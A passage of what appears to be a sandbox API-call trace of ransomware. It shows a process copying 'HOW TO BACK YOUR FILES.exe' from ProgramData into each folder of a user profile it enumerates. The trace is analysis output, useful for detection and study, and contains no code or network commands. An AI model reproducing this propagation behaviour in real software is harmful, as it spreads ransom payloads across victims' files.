your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.745] GetLastError () returned 0x0 [0065.745] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.745] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.745] CloseHandle (hObject=0x120) returned 1 [0065.745] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.745] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x58966660, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x58966660, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.746] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.746] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.746] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low" [0065.746] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low" [0065.746] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.746] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.746] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.747] GetLastError () returned 0x0 [0065.747] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.747] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.747] CloseHandle (hObject=0x120) returned 1 [0065.747] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.747] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.747] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.747] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.747] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5" [0065.747] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5" [0065.747] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.747] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\history\\history.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.748] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.754] GetLastError () returned 0x0 [0065.754] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.754] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.754] CloseHandle (hObject=0x120) returned 1 [0065.754] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.754] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\History\\History.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x589d8a80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x589d8a80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.754] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.754] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.755] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data" [0065.755] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data" [0065.755] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.755] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.755] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.755] GetLastError () returned 0x0 [0065.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.755] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.755] CloseHandle (hObject=0x120) returned 1 [0065.756] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.756] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49f874e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49f874e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.756] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.756] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.756] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0065.756] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files" [0065.756] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.756] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.757] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.757] GetLastError () returned 0x0 [0065.757] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.757] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.757] CloseHandle (hObject=0x120) returned 1 [0065.757] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.757] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x555c6940, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x555c6940, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.757] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.757] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.757] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0065.758] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized" [0065.758] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.758] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\virtualized\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.758] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.758] GetLastError () returned 0x0 [0065.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.758] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.758] CloseHandle (hObject=0x120) returned 1 [0065.759] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.759] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Virtualized\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a423f80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a423f80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.759] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.759] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.759] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0065.759] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low" [0065.759] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.759] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.760] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.760] GetLastError () returned 0x0 [0065.760] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.760] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.760] CloseHandle (hObject=0x120) returned 1 [0065.760] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.760] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a44a0e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a44a0e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.760] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.760] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.760] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.760] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5" [0065.761] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.761] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.761] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.761] GetLastError () returned 0x0 [0065.761] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.761] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.761] CloseHandle (hObject=0x120) returned 1 [0065.761] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.762] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x55638d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x55638d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.762] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.762] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.762] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.762] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0065.762] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.762] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.763] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.763] GetLastError () returned 0x0 [0065.763] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.763] ReadFile (in: hFile=0x120, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.763] CloseHandle (hObject=0x120) returned 1 [0065.763] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.763] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x558c04c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x558c04c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.763] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.763] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.763] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.763] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0065.764] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.764] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\Application Data\\Application Data\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\application data\\application data\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.764] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0065.764] GetLastError () returned 0x0 [0065.764] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 